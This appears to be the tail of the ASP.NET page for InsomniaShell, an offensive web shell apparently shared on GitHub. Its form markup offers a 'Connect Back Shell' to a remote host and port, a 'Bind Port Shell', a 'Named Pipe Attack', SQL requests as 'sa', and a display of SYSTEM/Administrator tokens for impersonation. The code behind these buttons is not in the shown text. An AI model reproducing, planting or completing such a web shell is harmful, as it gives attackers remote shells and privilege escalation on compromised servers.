<asp:Label ID="Label10" runat="server" Height="26px" Text="InsomniaShell" Width="278px" Font-Bold="True"></asp:Label><br />
<asp:Label ID="Label5" runat="server" Height="26px" Text="Current Context" Width="278px" Font-Bold="True"></asp:Label><br />
<% DisplayCurrentContext();%>
<br />
<asp:Label ID="Label1" runat="server" Height="26px" Text="Select Your Shell" Width="278px" Font-Bold="True"></asp:Label><br />
<br />
<asp:Label ID="Label2" runat="server" Text="Host" Width="198px"></asp:Label>
<asp:Label ID="Label3" runat="server" Text="Port" Width="101px"></asp:Label><br />
<asp:TextBox ID="txtRemoteHost" runat="server" Width="191px"></asp:TextBox>
<asp:TextBox ID="txtRemotePort" runat="server" Width="94px"></asp:TextBox><br />
<asp:Button ID="butConnectBack" runat="server" OnClick="butConnectBack_Click" Text="Connect Back Shell"
Width="302px" /><br />
<br />
<asp:Label ID="Port" runat="server" Text="Port" Width="189px"></asp:Label><br />
<asp:TextBox ID="txtBindPort" runat="server" Width="91px"></asp:TextBox><br />
<asp:Button ID="butBindPort" runat="server" OnClick="butBindPort_Click" Text="Bind Port Shell"
Width="299px" /><br />
<br />
<asp:Label ID="Label7" runat="server" Height="26px" Text="Named Pipe Attack" Width="278px" Font-Bold="True"></asp:Label><br />
<br />
<asp:Label ID="Label6" runat="server" Text="Pipe Name" Width="198px"></asp:Label><br />
<asp:TextBox ID="txtPipeName" runat="server" Text="InsomniaShell" Width="191px"></asp:TextBox><br />
<asp:Button ID="Button1" runat="server" OnClick="butCreateNamedPipe_Click" Text="Create Named Pipe" Width="400px" /><br />
<asp:Label ID="Label8" runat="server" Text="SQL User" Width="198px"></asp:Label>
<asp:Label ID="Label9" runat="server" Text="SQL Pass" Width="101px"></asp:Label><br />
<asp:TextBox ID="txtSQLUser" runat="server" Width="191px">sa</asp:TextBox>
<asp:TextBox ID="txtSQLPass" runat="server" Width="94px"></asp:TextBox><br />
<asp:Button ID="Button3" runat="server" OnClick="butSQLRequest_Click" Text="Make SQL Request" Width="400px" /><br />
<br />
<asp:Label ID="Label4" runat="server" Height="26px" Text="Available SYSTEM/Administrator Tokens" Width="400px" Font-Bold="True"></asp:Label><br />
<br />
<% DisplayAvailableTokens(); %>
</div>
</form>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment